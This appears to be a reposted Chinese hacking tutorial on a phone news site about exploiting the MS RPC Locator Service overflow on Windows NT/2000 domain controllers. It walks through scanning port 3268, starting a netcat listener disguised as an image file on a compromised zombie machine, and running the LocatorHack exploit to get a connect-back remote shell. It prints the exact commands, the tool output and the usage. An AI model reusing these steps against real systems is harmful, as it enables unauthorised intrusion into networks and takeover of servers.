加入收藏 | 设为首页 | 会员中心 | 我要投稿 187手机网 (https://www.187shouji.com/)- oppo手机、手机助手、华为手机、安卓手机、苹果手机!
当前位置: 首页 > 趣闻 > 正文

rpc漏洞的利用

发布时间:2019-11-25 23:22:28 所属栏目:趣闻 来源:本站整理
导读:,rpc漏洞的利用
sunx出的那个程序成功率还不错 
没用过的去sunx.org下载吧 
简要说一下用法(给没用过的看的) 
首先拿superscan去扫3268端口,因为这是域控制器的标志 
这个漏洞只对域控制器有效 
扫到这样的机器以后,用nc在本地监听一个端口 
我是内网,只好在肉鸡上监听了 
下面是在肉鸡上~nn.jpg就是我放上去的nc 
218.0.0.0代表目标机 
123.123.123.123 代表开nc监听的肉鸡 
-------------- 
D:WINNTsystem32>nn.jpg -l -p 1111 
nn.jpg -l -p 1111 
---------------~~ 
然后在本地(ip不能说啊)参数大家自己查吧 
--------------- 
C:>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111 
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx 
http://www.sunx.org 
for test only, dont used to hack,  

connect socket.... 
connect smb... 
open namedpipe... 
bind rpc... 
call rpc... 
Overflowed, 218.0.0.0:1111 ------???是不是弄错? 
good luck  
------------------ 
这时候肉鸡上就出现了对方的system32目录 
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port> 

OS Version: 
winnt: 1 
win2k: 2 
winxp: 3 
OS Language: 
english: 1 
chinese: 2 
japanese: 3 


Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99 

-h 目标主机 
-v OS Version 2000就选2 
-l OS Language 按照上面的选择 
-s 选择所打的补丁 
-r 开nc的主机,可以是你自己也可以放在肉鸡上 
-p 用nc开的端口 
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到. 

(编辑:187手机网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读